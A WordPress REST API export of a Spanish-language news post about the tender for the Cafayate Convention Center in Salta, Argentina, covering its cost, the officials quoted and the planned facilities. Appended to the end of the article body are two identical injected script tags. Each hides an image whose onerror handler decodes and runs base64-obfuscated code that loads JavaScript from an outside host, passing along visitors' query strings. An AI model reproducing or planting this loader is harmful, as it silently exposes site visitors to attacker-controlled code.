{"id":1653,"date":"2022-10-21T11:59:36","date_gmt":"2022-10-21T14:59:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1653"},"modified":"2025-08-14T00:32:39","modified_gmt":"2025-08-14T03:32:39","slug":"el-centro-de-convenciones-de-cafayate-promovera-el-desarrollo-turistico-y-economico-de-los-valles-calchaquies","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1653","title":{"rendered":"El Centro de Convenciones de Cafayate promover\u00e1 el desarrollo tur\u00edstico y econ\u00f3mico de los Valles Calchaqu\u00edes"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#860e2c\"><em>El turismo de reuniones es clave en el crecimiento de la actividad econ\u00f3mica y del empleo por la demanda de bienes y servicios que genera. La inversi\u00f3n ser\u00e1 casi de $800 millones.<\/em><\/h5>\n\n\n\n<p>El Gobierno provincial avanza en el proceso que finalizar\u00e1 con la puesta en funcionamiento del Centro de Convenciones de Cafayate, se realiz\u00f3 la apertura de sobres de la licitaci\u00f3n nacional convocada para la construcci\u00f3n de esta infraestructura que ser\u00e1 clave para el crecimiento tur\u00edstico de los Valles Calchaqu\u00edes. Cuando est\u00e9 en funcionamiento, posicionar\u00e1 a esta regi\u00f3n, con la ruta del vino de altura como producto ic\u00f3nico, como un punto de referencia nacional e internacional en la industria de reuniones. &nbsp;<\/p>\n\n\n\n<p>El Centro de Convenciones de la Ruta del Vino de Altura significa la movilizaci\u00f3n de oportunidades acad\u00e9micas, comerciales y la ampliaci\u00f3n de la oferta de Salta en la industria de turismo de reuniones. Generar\u00e1 puestos de trabajo propiciando el derrame en otras actividades no vinculadas directamente a la actividad tur\u00edstica.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes Mario Pe\u00f1a record\u00f3 que \u201cdurante la pandemia surgi\u00f3 la idea de esta obra y que r\u00e1pidamente encontr\u00f3 el apoyo del gobernador Gustavo S\u00e1enz a partir de una visi\u00f3n federal de este Gobierno\u201d. El a\u00f1o pasado se realiz\u00f3 un concurso nacional de anteproyecto que sent\u00f3 las bases para el llamado a licitaci\u00f3n nacional con el financiamiento del Banco Interamericano de Desarrollo (BID).<\/p>\n\n\n\n<p>\u00abSeguimos trabajando en equipo con la idea clara del Gobernador de invertir en &nbsp;obras que generen trabajo genuino en actividades econ\u00f3micas de Salta. Como Gobierno cumplimos con la palabra empe\u00f1ada\u00bb, enfatiz\u00f3 el funcionario.<\/p>\n\n\n\n<p>El ministro de Econom\u00eda&nbsp;<strong>Roberto Dib Ashur<\/strong>&nbsp;indic\u00f3 que \u00abel turismo es una actividad econ\u00f3mica para Salta muy importante y representa el 8, 9 o 10 % del producto bruto, por eso debemos seguir trabajando de esta manera federal, con obras como el Centro de Convenciones de Cafayate y en otras obras en el interior como es el caso del Dique Cabra Corral\u00bb.<\/p>\n\n\n\n<p>Desde el sector tur\u00edstico tambi\u00e9n estuvieron presentes las&nbsp;secretarias de Turismo Nadia Loza y de Financiamiento y Planificaci\u00f3n Financiera, Liliana Corona;&nbsp;el presidente del Bureau Salta Daniel Astorga, el presidente de la C\u00e1mara de Turismo de Salta Gustavo Di M\u00e9cola, la presidenta de la Asociaci\u00f3n de Hoteles de Turismo Mariana Farjat, la presidenta de la sociedad del Estado Centro de Convenciones Salta Andrea Pieve, y la directora ejecutiva de Inprotur Salta, Mar\u00eda Eugenia Cornejo. Tambi\u00e9n participaron el intendente de Cafayate Fernando Almeda y el diputado del departamento, Patricio Pe\u00f1alba.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4523-el-centro-de-convenciones-de-cafayate-promovera-el-desarrollo-turistico-y-economico-de-los-valles-calchaquies.jpg\" alt=\"\" width=\"292\" height=\"194\"\/><\/figure><\/div>\n\n\n<p>\u201cEs una gran alegr\u00eda para Cafayate y los Valles Calchaqu\u00edes la ejecuci\u00f3n de esta obra estrat\u00e9gica para el desarrollo porque abre una serie de opciones para otras actividades\u201d, afirm\u00f3 el intendente Almeda, quien marc\u00f3 el desaf\u00edo que demandar\u00e1 el proyecto ya que \u201ccomo ciudad, se deber\u00e1 incrementar servicios y capacitar a nuevos trabajadores de toda la regi\u00f3n que se sumar\u00e1n a la actividad tur\u00edstica\u201d. &nbsp;<br><br>Por otra parte record\u00f3 que \u201cen plena pandemia el ministro Pe\u00f1a le comunic\u00f3 la decisi\u00f3n pol\u00edtica de invertir en un Centro de Convenciones, eso habla de una visi\u00f3n federal de este Gobierno\u201d.<\/p>\n\n\n\n<p>Daniel Astorga se\u00f1al\u00f3 que \u201ccuando la industria del turismo de reuniones de todo el pa\u00eds se enter\u00f3 de esta obra en una ciudad ic\u00f3nica como Cafayate manifest\u00f3 las expectativas por su funcionamiento, tambi\u00e9n de futuros socios que se sumar\u00e1n como proveedores a la cadena de valor\u201d, adem\u00e1s indic\u00f3 que \u201cseguimos dando un mensaje de trabajo en conjunto y en equipo en Salta\u201d.<\/p>\n\n\n\n<p>El diputado provincial Patricio Pe\u00f1alba expres\u00f3 que \u201ca esta obra la esperamos con los brazos abiertos en Cafayate\u201d, destacando que es importante la generaci\u00f3n de empleos, ya desde la construcci\u00f3n de la infraestructura\u201d. Por otra parte, se refiri\u00f3 a la necesidad de avanzar con la profesionalizaci\u00f3n de los ciudadanos de Cafayate para cubrir \u201cla nueva demanda que seguramente crear\u00e1 el turismo\u201d.<\/p>\n\n\n\n<p><em><strong>Centro de Convenciones de Cafayate<\/strong><\/em><\/p>\n\n\n\n<figure class=\"wp-block-embed alignleft is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Centro de Convenciones de Cafayate promover\u00e1 el desarrollo de los Valles Calchaqu\u00edes\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/1jwYKoZ9Xh8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>La inversi\u00f3n para la obra es de m\u00e1s de 786 millones de pesos, a trav\u00e9s de fondos provinciales y del Banco Interamericano de Desarrollo (BID). El plazo de ejecuci\u00f3n es de 12 meses. Se construir\u00e1 \u00a0en el municipio de Cafayate, sobre la ruta 40, entre el r\u00edo Lorohuasi y el balneario que lleva el mismo nombre, con una superficie de aproximadamente 3.000 metros cuadrados.<\/p>\n\n\n\n<p>Contar\u00e1 con un espacio interior para 600 personas, salas moduladas, sal\u00f3n de usos m\u00faltiples, espacios de apoyo, sanitarios, versatilidad en los espacios, luminosidad, comunicaci\u00f3n permanente con el aire libre, adaptaci\u00f3n a distintos formatos de eventos, \u00e1rea de estacionamiento, etc.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Centro de Convenciones de Cafayate promover\u00e1 el desarrollo tur\u00edstico y econ\u00f3mico de los Valles\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/s6qmiU7Fobk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El turismo de reuniones es clave en el crecimiento de la actividad econ\u00f3mica y del empleo por la demanda de bienes y servicios que genera. La inversi\u00f3n ser\u00e1 casi de $800 millones. El Gobierno provincial avanza en el proceso que finalizar\u00e1 con la puesta en funcionamiento del Centro de Convenciones de Cafayate, se realiz\u00f3 la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1654,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,18],"tags":[],"class_list":{"0":"post-1653","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1653"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1653"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1653\/revisions"}],"predecessor-version":[{"id":7310,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1653\/revisions\/7310"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1654"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1653"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1653"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1653"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}